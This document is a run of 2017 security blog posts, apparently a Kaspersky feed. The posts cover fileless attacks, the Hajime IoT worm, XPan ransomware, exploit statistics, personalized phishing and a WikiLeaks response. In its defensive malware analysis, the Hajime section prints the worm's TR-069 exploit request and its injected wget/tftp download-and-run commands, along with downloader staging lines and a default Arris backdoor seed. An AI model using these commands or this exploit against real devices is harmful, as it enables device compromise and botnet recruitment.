We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions.

This trend makes traditional forensic analysis harder, traditional IOCs such as file hashes obsolete, application whitelisting more difficult, and antivirus evasion easier. It also helps to evade most of the log activity.

On the other hand, attackers usually need to escalate privileges or steal administrator credentials, they don´t usually have a reboot survival mechanism in the machines they want to infect, and they rely on accessing them when they are reconnected to the infected network. The use of standard tools in the victim environment might also limit their options. This new paradigm is still unfolding and the best practices from a defense perspective are currently not totally clear. However, we offer our recommendations in the final section of this document.


  • No malware samples are needed for the successful exfiltration of data from a network.
  • The use of standard and open source utilities, combined with different tricks, makes detection and attribution almost impossible.
  • The determination of attackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware. That is why memory forensics is becoming critical to the analysis of malware and its functions.
  • Incident response in cases like this is key.
How to keep yourself protected

Exploiting vulnerabilities remains a key approach to infecting systems, therefore timely patching is of utmost importance – which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.

Given the trend of using Powershell-based techniques, including bodiless malware scenarios, you need to make sure that your security solution is aware of such specifics. All tiers of Kaspersky Security Endpoint Security for Business as well as Kaspersky Security for Virtualization possess the broadest range of machine learning-powered detection techniques including those specifically taking care of malware using Powershell. Our behavioral System Watcher technology is also aware of specific Wiper activities like mass file deletion; after blocking the malware, its Rollback feature brings important user files back from their deleted state.

Still, it is necessary to understand that targeted attacks are dangerous not only because of their sophistication (which sometimes is not the case), but because they are usually well-prepared, and try to leverage security gaps unobvious to their targets.

Therefore, it is highly recommended that you arm yourself not only with prevention (such as endpoint protection) but also with detection capabilities, specifically with a solution that can detect anomalies in the whole network’s ongoing activities, and scrutinize suspicious files at a much deeper level than it is possible on users’ endpoints. Kaspersky Anti Targeted Attack is an intellectual detection platform that matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, Kaspersky Anti Targeted Attack is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.

And the best way to prevent the attackers from finding and leveraging security holes is getting rid of them all, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.

Hajime, the mysterious evolving botnet

Malware Alerts - Tue, 04/25/2017 - 04:58


Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown.

Hajime is continuously evolving, adding and removing features over time. The malware authors are mainly reliant on very low levels of security.

In this blogpost we outline some of the recent ‘improvements’ to Hajime, some techniques that haven’t been made public, and some statistics about infected IoT devices.

ATK module improvements

First of all, let’s take a look at the changes made to the attack module recently. Currently, the ATK (attack) module supports three different attack methods which help to propagate the worm on different IoT devices:

  1. TR-069 exploitation;
  2. Telnet default password attack;
  3. Arris cable modem password of the day attack.

Of these three attacks, the TR-069 exploit is a new one, implemented recently by the attackers.

Technical Report 069 is a standard published by the Broadband Forum, which is an industry organization defining standards used to manage broadband networks. Many ISPs and device manufacturers are members of the Broadband Forum. TR-069 allows ISPs to manage modems remotely. TCP port 7547 has been assigned to this protocol, but some devices appear to use port 5555 instead.

The TR-069 NewNTPServer feature can be used to execute arbitrary commands on vulnerable devices. In order to do so, the exploit starts by connecting to port 7547 and then sends the following HTTP request:

GET / HTTP/1.1



Content-Type: text/xml

Content-Length: 0

Where RANDOM_USER_AGENT is chosen from the following list:

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7

After some checks, it sends the following request to trigger the vulnerability:

POST /UD/act?1 HTTP/1.1



Content-Type: text/xml

Content-Length: BODY_LENGTH

SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers

<?xml version=”1.0″?>

<SOAP-ENV:Envelope xmlns:SOAP-ENV=”” SOAP-ENV:encoding”>“>


<u:SetNTPServers xmlns:u=”urn:dslforum-org:service:Time:1″>









The INJECT_COMMANDS can either be:

cd /tmp;tftp -l<INT_ARCH_ID> -r<INT_ARCH_ID> -g <SEED_IP_PORT>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>


cd /tmp;wget http://<SEED_IP_PORT>/<INT_ARCH_ID>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>

Once the vulnerable device executes the commands specified in INJECT_COMMANDS, the device is infected and becomes part of the botnet.

Architecture detection

With the addition of the new attack vector as described above, it would make sense to improve the architecture detection logic. This is because Hajime doesn’t attack any specific type of device, but rather any device on the Internet with the exception of several networks (it does has some logic to speed up attacks on specific devices though – see the next section). And this is exactly what they did, though strangely enough this only holds for the Telnet attack.

Once the attack successfully passes the authentication stage, the first 52 bytes of the victim’s echo binary are read. The first 20 bytes, which is the ELF header, hold information about the architecture, operating system and other fields. The victim’s echo ELF header is then compared against a predefined array, containing the Hajime stub downloader binaries for different architectures. This way the correct Hajime-downloader binary that works on the victim’s machine, can be uploaded from the attacker (which is actually the infected device that started the attack).

But before this, the host and port that the malware will be downloaded from needs to be set. The Hajime stub downloader binary has these values filled up with 0xCC bytes by default. To solve this, they are fixed on the fly right before connecting.

Furthermore the downloader needs to be patched with the WAN interface’s name. The attackers have a clever trick, where they ‘echo’ the binary to a file (“.s”), set the WAN interface name and then echo the last part of the binary (see below).

echo -ne “DOWNLOADER_HEX_BYTES” >> .s

(route -n | grep UG | grep lbr0 && echo -n lbr0 >> .s) || (route -n | grep UG | grep mta0 && echo -n mta0 >> .s)

echo -ne “DOWNLOADER_HEX_BYTES” >> .s

./.s>.i; chmod +x .i; ./.i; rm .s;


“Smart” password bruteforcing

Even though Hajime can attack any device, the authors nevertheless focused on some specific brands/devices. For example, if after opening a telnet session the welcome message contains one of the following words, then the bruteforcing starts with a specific username-password combination.

Password hint words:



Welcome to ATP Cli











One string that is not listed above is that of “ARRIS”, because if this string is found, the attack changes slightly. The Atk module uses a specially crafted password of the day for the Arris cable modem instead of using the static telnet passwords. The ARRIS password of the day is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily password. The default seed is “MPSJKMDHAI” and many ISPs don’t bother changing it at all. After successful authentication the module gains access to a remote shell and can execute commands.


While working on this blogpost, we collected statistics using three different methods:

  1. We had a honeypot with telnet open;
  2. We looked at the infected peers as DHT seeders;
  3. We looked at the infected peers as DHT leechers;

Of these three methods, the DHT leecher count proved to be the best. By announcing on the DHT network with a peer id similar to that day’s identifier of the configuration file we were able to be the “nearest” node and collected requests from almost every infected device.

The DHT seeder count is an inverse method; we were requesting the Hajime config and receiving the lists of seeding nodes. Due to the limitations of the DHT architecture we can see most of the leechers, but not most of the seeders. Therefore, the seeder data is of less relevance than the leecher data.

Geography of telnet attackers

Our honeypot registered 2,593 successful telnet Hajime attacks in 24 hours. 2,540 of them were from unique IP addresses, 949 hosts provided a payload and 528 had an active web server running at port 80/tcp.

Distribution of attackers by country Vietnam 509 20.04% Taiwan 327 12.87% Brazil 227 8.94% Turkey 167 6.57% Korea 150 5.91% India 141 5.55% China 97 3.82% Russia 72 2.83% Romania 69 2.72% Colombia 58 2.28% Mexico 54 2.13% Others 669 26.34% Total 2540 Victim device web server analysis

The HTTP server version is typically shown in the HTTP server response headers. After a little analysis we see that most of the victims turn out to be DVRs, followed by web cameras, routers, etc.

http header “Server” statistics 364 Server: uc-httpd 1.0.0 43 Server: WCY_WEBServer/2.0 9 Server: Boa/0.94.14rc21 4 Server: thttpd/2.25b-lxc 29dec2003 3 Server: Router Webserver 2 Server: GoAhead-Webs 2 Server: JAWS/1.0 May 26 2014 2 Server: nginx/1.4.4 1 Server: DNVRS-Webs 1 Server: IPCamera-Webs 1 Server: IPCamera-Webs/2.5.0 1 Server: JAWS/1.0 Aug 21 2013 1 Server: JAWS/1.0 Jul 9 2013 1 Server: JAWS/1.0 Jun 13 2013 1 Server: JAWS/1.0 Jun 25 2013 1 Server: JAWS/1.0 Mar 20 2014 1 Server: JAWS/1.0 May 13 2013 1 Server: Microsoft-IIS/7.5 1 Server: Web server 1 Server: WebServer Web interface “title” statistics 315 NETSurveillance WEB 84 WEB SERVICE 37 NETSuveillance WEB 36 IVSWeb 2.0 – Welcome 21 9 main page 6 NEUTRON 4 WEB SURVEILLANCE 3 CPPLUS DVR –Web View 2 IVSWeb 2.0 – Добро пожаловать 2 IVSWEB_TITLE – IVSWEB_LOGIN_TITLE 2 replace 1 CPPLUS DVR–Web View 1 GIGA Security 1 IIS7 1 iProview Web 2.0 – Welcome 1 IVSWeb 2.0 – Hoş geldiniz 1 IVSWeb 2.0 – Witamy 1 WATASHI SERVICE Geography of infected peers as DHT seeders

Throughout the research period, at least 15,888 unique infected boxes were revealed, though this number is not very accurate. All of them were seeding Hajime config.

Distribution of infected boxes by country Iran 2285 14.38% Vietnam 1819 11.45% Brazil 1102 6.94% Turkey 911 5.73% China 909 5.72% Taiwan 805 5.07% Russia 747 4.70% India 642 4.04% Korea 624 3.93% Mexico 542 3.41% Others 5502 34.63% Total 15888 Geoip of infected peers as DHT leechers

This method revealed 297,499 unique infected hosts during the research period. All of them were requesting Hajime config.

Distribution of leechers by country Iran 58465 19.65% Brazil 26188 8.80% Vietnam 23418 7.87% Russia 22268 7.49% Turkey 18312 6.16% India 16445 5.53% Pakistan 14069 4.73% Italy 10530 3.54% Taiwan 10486 3.52% Australia 9436 3.17% Others 87882 29.54% Total 297499 Conclusion

The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. And maybe this will never happen, because every time a new configuration file is downloaded, a piece of text is displayed through stdout while the new configuration is being processed:

Example message:

Whether the author’s message is true or not remains to be seen. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible.

Kaspersky Labs products detect this threat as Backdoor.Linux.Hajime.


Hajime avoids this ip subnetworks (which hardcoded in a module): Ukraine; Region Vinnyts’ka Oblast’ Iran, Islamic Republic of; Region Tehran Germany Virtela Communications Inc Amsterdam, NL POP South Africa; Region Gauteng IANA – Local Identification General Electric Company Hewlett-Packard Company Hewlett-Packard Company US Postal Service Multicast

United States Department of Defense:

Private networks:

XPan, I am your father

Malware Alerts - Mon, 04/24/2017 - 04:55

While we have previously written on the now infamous XPan ransomware family, some of it’s variants are still affecting users primarily located in Brazil. Harvesting victims via weakly protected RDP (remote desktop protocol) connections, criminals are manually installing the ransomware and encrypting any files which can be found on the system.

Interestingly, this XPan variant is not necessarily new in the malware ecosystem. However, someone has chosen to keep on infecting victims with it, encouraging security researchers to hunt for samples related to the increasing number of incident reports. This sample is what could be considered as the “father” of other XPan ransomware variants. A considerable amount of indicators within the source code depict the early origins of this sample.

“Recupere seus arquivos aqui.txt” loosely translated to “recover your files here” is a phrase that not many Brazilian users are eager to see in their desktops.

The ransomware author left a message for Kaspersky in other versions and has done the same in this one, with traces to the NMoreira “CrypterApp.cpp” there’s a clear link between different variants among this malware family.

NMoreira, XPan, TeamXRat, different names but same author.

Even though many Brazilian-Portuguese strings are present upon initial analysis, there were a couple that caught our attention. Firstly, the ransomware uses a batch file which will pass a command line parameter to an invoked executable file, this parameter is “eusoudejesus” which means “I’m from Jesus”. Developers tend to leave tiny breadcrumbs of their personality behind in each one of their creations, and in this sample we found many of them.

A brief religious reference found in this XPan variant.

Secondly, a reference to a Brazilian celebrity is done, albeit indirectly. “Computador da Xuxa” was a toy computer sold in Brazil during the nineties, however it’s also a popular expression which is used to make fun of very old computers with limited power.

This is what cybercriminals think of your encrypted computer: just a toy they can control.

“Muito bichado” equals to finding a lot of problems in these type of systems, in this case meaning that the environment in which is XPan is executing is not playing fair and the execution is quite buggy.

Lastly, we have the ransomware note demanding the victim to send an email to the account ‘’. Considering that the extension for all the encrypted files in this variant is ‘.one’ this seems like a pretty straightforward naming convention for the criminals’ campaigns.

The rescue note in Portuguese.

Upon closer inspection, we discovered that this sample is nearly identical to another version of Xpan which used to be distributed back in November 2016 and used the extension “.__AiraCropEncrypted!”. Every bit of executable code remains the same, which is quite surprising, because since that time there were several newer versions of this malware with an updated encryption algorithm. Both samples have the same PE timestamp dating back to the 31st of October 2016.

The only difference between the two is the configuration block which contains the following information:

  • list of target file extensions;
  • ransom notes;
  • commands to execute before and after encryption;
  • the public RSA key of the criminals.

The decrypted configuration block of Xpan that uses the extension “.one”.

The file encryption algorithm also remains the same. For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. The string S will be encrypted using the criminals’ RSA public key from the configuration block and stored in the beginning of the encrypted file.

According to one of the victims that contacted us, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

The victims so far are small and medium businesses in Brazil: ranging from a dentist clinic to a driving school, demonstrating once again that ransomware makes no distinctions and everyone is at risk. As long as there are victims, assisting them and providing decryption tools whenever possible is necessary, no matter the ransomware family or when it was created.

Victims: we can help

This time luck is on the victims’ side! Upon thorough investigation and reverse engineering of the sample of “.one” version of Xpan, we discovered that the criminals used a vulnerable cryptographic algorithm implementation. It allowed us to break encryption as with the previously described Xpan version.

We successfully helped a driving school and a dentist clinic to recover their files for free and as usual we encourage victims of this ransomware to not pay the ransom and to contact our technical support for assistance in decryption.

Brazilian cybercriminals are focusing their efforts in creating new and local ransomware families, attacking small companies and unprotected users. We believe this is the next step in the ransomware fight: going from global scale attacks to a more localized scenario, where local cybercriminals will create new families from scratch, in their own language, and resorting to RaaS (Ransomware-as-a-service) as a way to monetize their attacks.

MD5 reference

dd7033bc36615c0fe0be7413457dccbf – Trojan-Ransom.Win32.Xpan.e (encrypted file extension: “.one”)
54217c1ea3e1d4d3dc024fc740a47757 – Trojan-Ransom.Win32.Xpan.d (encrypted file extension: “.__AiraCropEncrypted!”)

Exploits: how great is the threat?

Malware Alerts - Thu, 04/20/2017 - 04:57

How serious, really, is the danger presented by exploits? The recent leak of an exploit toolset allegedly used by the infamous Equation Group suggests it’s time to revisit that question. Several zero-days, as well as a bunch of merely ‘severe’ exploits apparently used in-the-wild were disclosed, and it is not yet clear whether this represents the full toolset or whether there’s more to come, related to either Equation or another targeted threat actor.

Of course, Equation Group is not the first, and is certainly not the only sophisticated targeted attacker to use stealthy, often zero-day exploits in its activity.

Today we are publishing an overview of the exploit threat landscape. Using our own telemetry data and intelligence reports as well as publically available information, we’ve looked at the top vulnerabilities and applications exploited by attackers.

We have examined them from two equally important perspectives. The first part of the report summarises the top exploits targeting all users in 2015-2016, and the most vulnerable applications. The second part considers the vulnerabilities exploited between 2010 and 2016 by significant targeted threat actors reported on by Kaspersky Lab: that’s 35 actors and campaigns in total.

Key findings on exploits targeting all users in 2015-2016:
  • In 2016 the number of attacks with exploits increased 24.54%, to 702,026,084 attempts to launch an exploit.
  • 4,347,966 users were attacked with exploits in 2016 which is 20.85% less than in the previous year.
  • The number of corporate users who encountered an exploit at least once increased 28.35% to reach 690,557, or 15.76% of the total amount of users attacked with exploits.
  • Browsers, Windows, Android and Microsoft Office were the applications exploited most often – 69.8% of users encountered an exploit for one of these applications at least once in 2016.
  • In 2016, more than 297,000 users worldwide were attacked by unknown exploits (zero-day and heavily obfuscated known exploits).

2015-2016 witnessed a number of positive developments in the exploit threat landscape. For example, two very dangerous and effective exploit kits – Angler (XXX) and Neutrino, left the underground market, depriving cybercriminals community of a very comprehensive set of tools created to hack computers remotely.

A number of bug bounty initiatives aimed at highlighting dangerous security issues were launched or extended. Together with the ever-increasing efforts of software vendors to fix new vulnerabilities, this significantly increased the cost to cybercriminals of developing new exploits. A clear victory for the infosec community that has resulted in a drop of just over 20% in the number of private users attacked with exploits: from 5.4 million in 2015 to 4.3 million in 2016.

However, alongside this welcome decline, we’ve registered an increase in the number of corporate users targeted by attacks involving exploits. In 2016, the number of attacks rose by 28.35% to reach more than 690,000, or 15.76% of the total amount of users attacked with exploits. In the same year, more than 297,000 users worldwide were attacked by unknown exploits. These attacks were blocked by our Automatic Exploit Prevention technology, created to detect this type of exploits.

Key findings on exploits used by targeted attackers 2010 -2016:
  • Overall, targeted attackers and campaigns reported on by Kaspersky Lab in the years 2010 to 2016 appear to have held, used and re-used more than 80 vulnerabilities. Around two-thirds of the vulnerabilities tracked were used by more than one threat actor.
  • Sofacy, also known as APT28 and Fancy Bear seems to have made use of a staggering 25 vulnerabilities, including at least six, if not more zero-days. The Equation Group is not far behind, with approximately 17 vulnerabilities in its arsenal, of which at least eight were zero-days, according to public data and Kaspersky Lab’s own intelligence.
  • Russian-speaking targeted attack actors take three of the top four places in terms of vulnerability use (the exception being Equation Group in second place), with other English- and Chinese-speaking threat actors further down the list.
  • Once made public, a vulnerability can become even more dangerous: grabbed and repurposed by big threat actors within hours.
  • Targeted attackers often exploit the same vulnerabilities as general attackers – there are notable similarities between the list of top vulnerabilities used by targeted threat actors in 2010-2016, and those used in all attacks in 2015-2016.

When looking more closely at the applications used by targeted threat actors to mount exploit-based attacks, we weren’t surprised to discover that Windows, Flash and Office top the list.

Applications and Operation Systems most often exploited by targeted attack groups.

Moreover, the recent leak of multiple exploits allegedly belonging to the Equation cyberespionage group highlighted another known but often overlooked truth: the life of an exploit doesn’t end with the release of a security patch designed to fix the vulnerability being exploited.

Our research suggests that threat actors are still actively and successfully exploiting vulnerabilities patched almost a decade ago – as can be seen in the chart below:

Everyone loves an exploit

Exploits are an effective delivery tool for malicious payloads and this means they are in high demand among malicious users, whether they are cybercriminal groups, or targeted cyberespionage and cybersabotage actors.

To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.

Conclusion and Advice

The conclusion is a simple one: even if a malicious user doesn’t have access to expensive zero-days, the chances are high that they’d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated.

Even though developers of popular software invest huge resources into finding and eliminating bugs in their products and exploit mitigation techniques, for at least the foreseeable future the challenge of vulnerabilities will remain.

In order to protect your personal or business data from attacks via software exploits, Kaspersky Lab experts advise the following:

  • Keep the software installed on your PC up to date, and enable the auto-update feature if it is available.
  • Wherever possible, choose a software vendor which demonstrates a responsible approach to a vulnerability problem. Check if the software vendor has its own bug bounty program.
  • If you are managing a network of PCs, use patch management solutions that allow for the centralized updating of software on all endpoints under your control.
  • Conduct regular security assessments of the organization’s IT infrastructure.
  • Educate your personnel on social engineering as this method is often used to make a victim open a document or a link infected with an exploit.
  • Use security solutions equipped with specific exploit prevention mechanisms or at least behavior-based detection technologies
  • Give preference to vendors which implement a multilayered approach to protection against cyberthreats, including exploits.

Further details on exploits used in attacks in 2015 and 2016, as well as by the big targeted threat actors over the last six years – and Kaspersky Lab guidance on how to address the threat they present, can be found in the full report.

MktoForms2.loadForm("//", "802-IJN-240", 11329);

Social Media Postings

SANS Tip of the Day - Thu, 04/20/2017 - 01:00
Be careful: the more information you post online about yourself, the easier it is for a cyber attacker to target you and create custom attacks against you or your organization.

Personalized Spam and Phishing

Malware Alerts - Wed, 04/19/2017 - 05:58

Most spam, especially the sort that is mass-mailed on behalf of businesses, has quite an impersonal format: spammers create a message template for a specific mailing purpose and often drastically diversify the contents of that template. Generally, these kinds of messages do not personally address the recipient and are limited to common phrases such as “Dear Client”. The most that personal data is ever involved is when the name of the mailbox (or part of it) is substituted with the electronic address that the spammer has. Any specifics that may help the recipient ascertain whether the message is addressed personally to him or not, for example, an existing account number, a contract number, or the date of its conclusion, is missing in the message. This impersonality, as a rule, attests toa phishing attempt.

Lately, however, we have been noticing an opposite tendency occurring quite often, wherein fraud becomes personalized and spammers invent new methods to persuade the recipient that the message is addressed personally to him. Thus, in the malicious mailing that we discovered last month, spammers used the actual postal addresses of the recipients in messages to make them seem as credible as possible. This information is sold to evildoers as ready-to-use databases with physical addresses (they are frequently offered for sale in spam messages), collected by evildoers from open sources, or obtained by evildoers when hacking email accounts, for example. Of course, cybercriminals will not have very many of these addresses at their disposal (compared to generated addresses), but they are much more valuable.

The way spammers organize their personalized attacks plays an important role as well. In general, messages are mass mailed on behalf of an existing company, while the technical headers of fake messages use the company’s actual details.

There are several ways to use valid details. The most unsophisticated method is spoofing, which is substitution of technical headers in messages. The headers can be easily placed with any mass mailing program. In particular, during the spoofing process, the “From” field contains the real address of the sender that the fraudsters have. In this case, spam will be mass-mailed on behalf of the spoofed company, which can stain the company’s reputation quite seriously. Yet, not all technical headers can be substituted when spoofing, and good anti-spam filters will not let these messages through.

Another method entails sending spam from so-called hijacked infrastructure, which is much harder to do technically, as the mail server of the target company has to be hacked. After gaining control over it, an evildoer can start sending messages with legitimate technical headers from any email address owned by the company and on behalf of any employee who works there. At the same time, the fake message looks quite credible for anti-spam filters and freely travels from server to server, as all of the necessary certificates and digital signatures in the header correspond to genuine counterparts. This would result in losses by both the recipient, who takes the bait of the evildoers (network infection and theft of personal data or business information), and the company, whose infrastructure is abused by the evildoers.

Usually, cybercriminals select small businesses (with up to several dozen employees) as victims for hacking. Owners of so-called parked domains are of particular interest, as parked domains are used by a company without creating a website on these domains.

In the samples detected by us, personalized malicious spam was mass-mailed on behalf of an existing business that was a small company specialized in staff recruitment. The messages contained order delivery notifications that are typical of malicious spam, but also indicated the real postal addresses of the recipients. The messages also contained URLs that were located on legitimate domains and were constantly changing throughout the mailings. If a user navigates to the URL, then malicious software will be downloaded to the user’s computer.

In this way, we may affirm that spam is becoming more personalized and mailing is becoming targeted. With the rising digital literacy of users, this is exactly what evildoers rely upon; It is not so easy to remember all your subscriptions, all your online orders, or where you’ve left your personal data, including addresses. Such an information load calls for the use of smart security solutions and the employment of security measures to protect your “information-driven personality”.

The security is still secure

Malware Alerts - Thu, 04/13/2017 - 09:49

Recently WikiLeaks published a report that, among other things, claims to disclose tools and tactics employed by a state-sponsored organization to break into users’ computers and circumvent installed security solutions.

The list of compromised security products includes dozens of vendors and relates to the whole cybersecurity industry. The published report includes a description of vulnerabilities in software products that can be used to bypass protection and jeopardize users’ security.

Customers’ security is a top priority for Kaspersky Lab, and as such we take any information that could undermine users’ protection very seriously. We thoroughly investigate all reported vulnerabilities.

The published report contains descriptions of two vulnerabilities in Kaspersky Lab’s products that have already been fixed. It also includes a number of mentions related to the company’s technologies and past Advanced Persistent Threat (APT) research. I’d like to take this opportunity to address possible concerns regarding the report and provide reliable first-hand information to demonstrate that no current Kaspersky Lab products and technologies are vulnerable.

Vulnerabilities in security solutions

First of all, I’d like to emphasize that the vulnerabilities in Kaspersky Lab’s products listed in the report are related to older versions of the products, and they were publicly disclosed and fixed some time ago. The current versions of our products are not vulnerable to the tools and tactics listed.

The “heapgrd” DLL inject vulnerability was discovered and fixed in Kaspersky Lab products back in 2009. The vulnerability allowed a malefactor to load a third-party DLL instead of the WHEAPGRD.dll file and thus bypass protection. It was patched starting with Kaspersky Internet Security 9 and Kaspersky Antivirus for Workstations MP4. The products that were mentioned in relation to these vulnerabilities (Kaspersky Internet Security 7 and 8 and Kaspersky Antivirus for Workstations MP3) are outdated and no longer supported. All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release.

The TDSS Killer’s DLL inject vulnerability mentioned in the WikiLeaks report was fixed in 2015.

Product behavior specifics

The report also says Kaspersky Lab’s security solutions do not block DLL injections into user processes and svchost.exe. In fact, we do protect against this sort of attack — in a smarter way that elegantly combines protection and a better user experience.

Nowadays, it’s common practice for legitimate applications to inject their code into user processes. To effectively distinguish legitimate from malicious actions, track changes, and restore unwanted amendments an application may make to the system, Kaspersky Lab’s products have included the System Watcher component since 2011. System Watcher monitors all processes on a device, including svchost.exe, and is capable of detecting malicious behavior, blocking it, and rolling back malicious changes.

The report also describes several tools and malicious programs that were used to collect data and infiltrate the users’ computers. However, all of them can be neutralized with Kaspersky Lab’s products. Let’s take a closer look at them.

First, the RickyBobby fileless Trojan is allegedly not detected by Kaspersky Lab’s products, which is not the case. All personal and enterprise level products can detect this Trojan, prevent the infection, and disinfect a system that was protected by a third-party or outdated security solution.

Second, the report mentions two other malware samples (Fine Dining and Grasshopper) that allegedly are not detected by Kaspersky Lab’s products. However, the report doesn’t provide further details of the malware. We will keep investigating the issue and report the findings as soon as details are available.

That said, we are skeptical: It’s said Fine Dining relies on the aforementioned DLL inject vulnerability in TDSS Killer, which is already fixed. Also it’s worth mentioning that Kaspersky products provide multiple layers of protection — such as emulation, heuristics, System Watcher, and Automatic Exploit Prevention — including those powered by industry-leading machine learning. These technologies are capable of detecting cyberthreats proactively based on their behavior and are constantly improved to address new techniques employed by malicious actors. The analysis of the report makes us optimistic that our customers are already protected against both Fine Dining and Grasshopper.

Third, the report mentions HammerDrill, API Memcry, and Trojan Upclicker, which use a variety of techniques to try to avoid detection by the emulator technology.

Kaspersky Lab’s emulator’s history dates back to the early 90s. It’s rated one of the best in the cybersecurity industry, and it’s continuously improved. The functionality to address the described Trojan Upclicker cloaking method was included in the emulator more than a year ago, for example. The other two tools are effectively managed by the multilayer protection available in Kaspersky Lab’s products both for home users and enterprise customers.

Fourth, the report mentions an MBR File Handle component that is able to circumvent security solutions’ drivers and thus upload malware into the Master Boot Record of the operating system.

In fact, this trick is foiled by the antirootkit technology included in Kaspersky Lab products, which enables them to reliably detect and remove infections — even the most advanced bootkits.

Fifth, another tool mentioned in the report is the Bartender program, which collects data on installed software. This functionality is not malicious and is used by many legitimate applications. However, Kaspersky Lab’s products do provide protection against such activity should a user select the high security level setting.

Fun facts

The other two mentions of Kaspersky Lab in the context of malware creation are actually fun facts.

First, the tool called DriftingShadows checks if Kaspersky Lab’s products are installed on the device, and if it finds them, it does … nothing. This means that the malware creators failed to sneak past our products. They now avoid protected devices so that their malware doesn’t get caught.

Second, the documents also describe a game called “Bonus: Capture the Flag” played among malware creators. It involves attempts to create a malware sample that bypasses Kaspersky Lab’s protection. In other words, malefactors consider our products a gold standard of cybersecurity.


Investigating the existing report thoroughly, we found two vulnerabilities and several other mentions of Kaspersky Lab, including discussions regarding our reports on the Duqu 2.0 and Equation cyberespionage campaigns. Both vulnerabilities were fixed quite some time ago and pose no threat to our customers. The same goes for the other malicious tools and techniques mentioned.

However, we are staying vigilant and continuously monitoring the situation. WikiLeaks may yet publish more details. In any case, we’d like to reassure customers that addressing any possible vulnerabilities will be our top priority.

No development process guarantees immediate, perfect, permanent invincibility. We are committed to constantly improving the development process, and we also make significant efforts to perfect the process of fixing newly discovered vulnerabilities.

Old Malware Tricks To Bypass Detection in the Age of Big Data

Malware Alerts - Thu, 04/13/2017 - 05:44

Kaspersky Lab has been tracking a targeted attack actor’s activities in Japan and South Korea recently. This attacker has been using the XXMM malware toolkit, which was named after an original project path revealed through a pdb string inside the file: “C:\Users\123\documents\visual studio 2010\Projects\xxmm2\Release\test2.pdb”. We came across an unusual technique used by a sample which contained no pdb strings but was very similar to a variant of XXMM malware in terms of code similarity, malware functionality, crypto-algorithm, data structures and module configuration.

The malware sample we observed was named “srvhost.exe” to resemble a standard system process name. It came from one of our partners at the beginning of 2017. One of the most surprising features of the malware was its file size, which is not commonly seen in malware – it was over 100MB. According to our analysis, this malware is a Trojan loader component that activates a backdoor. We could not confirm pdb strings from this malware, however the backdoor module seems to be named “wali” by the author, according to strings from the embedded config block.

Fig. config strings with “[wali]” section

Fig. “wali.exe” name in the malware body

The wali loader decrypts the embedded wali backdoor using the “\x63” byte and a simple XOR operation. The XOR key is not only  . Then, the wali backdoor module is injected into the memory of the iexplore.exe process by the loader.

What is inside the wali loader that makes it so big in size? The reason is that this sample has a very big overlay of junk data. We found more than 20 other similar samples (wali loader + overlay) using open source intelligence and by searching our malware collection using YARA rule. After removing the overlay, there were only six unique samples.

md5_payload md5_payload+overlay size d1e24c3cc0322b22988a1ce366d702e5 8bd0ddeb11518f3eaaddc6fd82627f33 105982049 e4811950899f44f9d14a786b4c5b1faa 2871ec229804a6e872db55dafa5c9713 105997178 3e24710d7ade27316d367dd8cb2a0b1a 105996860 3e9feea893482b65a68b1feecb71cd4d 105997043 558ca7fa8ed632fa4f8c69e32888af0f 105997191 d11f7b25823ce474e30e8ab9c8d567b0 105996847 f4c3f06faf53ad2bbc047818344a2323 105997181 f7cc6a5a06cd032c6172d14c1568b976 105997102 e7492f11c88d32e1e0b43f6b29604ec8 6a5558e4ab530f9b5c2d5bcc023d3218 105997658 bb8cef31cf6211c584d245be88573e1f 105997755 Table. Some samples of 100M+ bytes wali loader + overlay

